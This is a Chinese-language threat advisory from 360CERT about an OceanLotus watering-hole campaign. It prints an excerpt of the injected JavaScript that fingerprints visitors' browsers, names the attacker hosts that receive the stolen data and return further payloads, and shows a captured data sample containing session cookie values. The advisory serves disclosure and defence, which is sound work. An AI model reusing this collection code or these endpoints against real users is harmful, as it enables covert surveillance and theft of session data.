Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

0
0
【APT报告】海莲花(OceanLotus)APT团伙新活动通告

2017-11-08 20:27:21

阅读:926次
点赞(0)
收藏
来源: 安全客





【APT报告】海莲花(OceanLotus)APT团伙新活动通告

作者:360CERT





【APT报告】海莲花(OceanLotus)APT团伙新活动通告

作者:360威胁情报中心 && 360CERT


文档信息


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

通告背景

2017 年 11 月 6 日,国外安全公司发布了一篇据称海莲花 APT 团伙新活动的报告,360 威胁情报中心对其进行了分析和影响面评估,提供处置建议。


事件概要


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

事件描述

2017 年 11 月 6 日,国外安全公司 Volexity 发布了一篇关于疑似海莲花 APT 团伙新活动的 报告,该报告指出攻击团伙攻击了与政府、军事、人权、民主、媒体和国家石油勘探等有关 的个人和组织的 100 多个网站。通过针对性的 javascript 脚本进行信息收集,修改网页视 图,配合社会工程学诱导受害人点击安装恶意软件或者登陆钓鱼页面,以进行下一步的攻击渗透。


事件时间线

2017 年 11 月 6 日 Volexity 公司发布了据称海莲花新活动的报告。

2017 年 11 月 7 日 360 威胁情报中心发现确认部分攻击并作出响应。


影响面和危害分析

攻击者团伙入侵目标用户可能访问的网站,不仅破坏网站的安全性,还会收集所访问用户的 系统信息。如果确认感兴趣的目标,则会执行进一步的钓鱼攻击获取敏感账号信息或尝试植 入恶意程序进行秘密控制。

目前 360 威胁情报中心确认部分网站受到了影响,用户特别是政府及大企业有必要结合附 件提供的 IOC 信息对自身系统进行检查处理。


处置建议

1. 网站管理员检查自己网站页面是否被植入了恶意链接,如发现,清理被控制的网站中嵌 入的恶意代码,并排查内部网络的用户是否被植入了恶意程序。

2. 电脑安装防病毒安全软件,确认规则升级到最新。


技术分析

通过水坑攻击将恶意 JavaScript 代码植入到合法网站,收集用户浏览器指纹信息,修改网 页视图诱骗用户登陆钓鱼页面、安装下载恶意软件。

探针一

从样本 JavaScript 出发

http://45.32.105.45/ajax/libs/jquery/2.1.3/jquery.min.js?s=1&v=86462

jquery 的最下面有个 eval


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

核心获取传输数据部分如下:

varbrowser_hash='b0da8bd67938a5cf22e0-37cea33014-iGJHVcEXbp'; vardata={'browserhash':browserhash,'type':'ExtendedBrowserInfo','action':'replace','name':'WebRTC','value':array2json(window.listIP).replace(/"/g,'\"'),'log':'ReceicedWebRTCdatafromclient{client}.'}; vardata={'browserhash':browserhash,'type':'ExtendedBrowserInfo','name':'BrowserPlugins','action':'replace','value':array2json(plugins).replace(/"/g,'\"'),'log':'ReceicedBrowserPluginsdatafromclient{client}.'}; varinfo={'Screen':screen.width+'x'+screen.height,'windowsize':window.outerWidth+'x'+window.outerHeight,'Language':navigator.language,'Cookie Enabled':(navigator.cookieEnabled)?'Yes':'No','JavaEnabled':(navigator.javaEnabled())?'Yes':'No'}; vardata={'browserhash':browserhash,'type':'ExtendedBrowserInfo','name':'ExtendedBrowserInfo','action':'replace','value':array2json(info).replace(/"/g,'\"'),'log':'ReceicedExtendedBrowserInfodatafromclient{client}.'};

探针二

获取数据部分

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

核心传输数据部分


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

传输内容

'{"history":{"client_title":"", "client_url":"https://www.google.co.kr/_/chrome/newtab?espv=2&ie=UTF-8", "client_cookie":"SID=TQUtor57TAERNu6GqnR4pjxikT_fUFRYJg0WDuQR6DLPYP79ng8b20xLV45BALRr9EP0ig.; APISID=czIiWPC84XzsPhi7/AEXqM7jJZBOCVK4NB; SAPISID=EukztCzcUbvlcTe3/A0h8Z8oQR86VGPTf_; UULE=a+cm9sZToxIHByb2R1Y2VyOjEyIHByb3ZlbmFuY2U6NiB0aW1lc3RhbXA6MTUxMDA1Mzg3NDY1OTAwMCBsYXRsbmd7bGF0aXR1ZGVfZTc6Mzk5ODE5MzY5IGxvbmdpdHVkZV9lNzoxMTY0ODQ5ODQ5fSByYWRpdXM6MzM0ODA=; 1P_JAR=2017-11-8-2", "client_hash":"", "client_referrer":"", "client_platform_ua":"Mozilla/5.0(Macintosh;IntelMacOSX10_12_6)AppleWebKit/537.36(KHTML,likeGecko)Chrome/61.0.3163.100Safari/537.36", "client_time":"2017-11-08T03:40:25.641Z", "client_network_ip_list":["10.17.52.196"], "timezone":"Asia/Shanghai"}}'

执行步骤

首先根据基础信息,引用到指定版本的恶意 jQuery js 文件进一步收集信息后获取新的 JavaScript payload。此 payload 是大量的基础的函数以及更详尽的设备信息收集,同时还 通过 WebRTC 获得真实 IP 地址。发送信息到通信地址加载新的 JavaScript payload,此 payload 进一步信息收集或者产生后续攻击变换。


数据传输地址

探针一

接受数据 //45.32.105.45/icon.jpg?v=86462&d={data}

根据参数下发

payload //45.32.105.45/ajax/libs/jquery/2.1.3/jquery.min.js?&v=86462&h1={data}&h2={da ta}&r={data}

探针二

往以下地址 POST 数据,并接受新的 js 并运行//ad.jqueryclick.com/117efea9-be70-54f2-9336-893c5a0defa1


信息收集列表

浏览器中执行的恶意代码会收集如下这些信息:

浏览器类型

浏览器版本

浏览器分辨率,DPI

cpu 类型

cpu 核心数

设备分辨率

buildID

系统语言 TLP:WHITE http://ti.360.net

jsHeapSizeLimit

screen.colorDepth

是否开启 cookie

是否开启 java

已经加载的插件列表

referrer

当前网络的 IP 地址

Cookie

更多技术细节可以参看参考资料的网页。


关联分析及溯源

360威胁情报中心尝试通过分发JavaScript的恶意域名的WHOIS信息来对本次事件做一些 关联分析,一共 38 个域名,基本上都使用了隐私保护,注册时间则分布于 2014 年 3 月-2017 年 10 月,可见攻击团伙的活动时间之长准备之充分。如下是其中一个域名的注册信息:


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

参考资料

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance -and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/


更新历史


【APT报告】海莲花(OceanLotus)APT团伙新活动通告

附件

IOC列表



【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告

【APT报告】海莲花(OceanLotus)APT团伙新活动通告


【APT报告】海莲花(OceanLotus)APT团伙新活动通告
【APT报告】海莲花(OceanLotus)APT团伙新活动通告
本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/learning/detail/4680.html

Viewing all articles
Browse latest Browse all 12749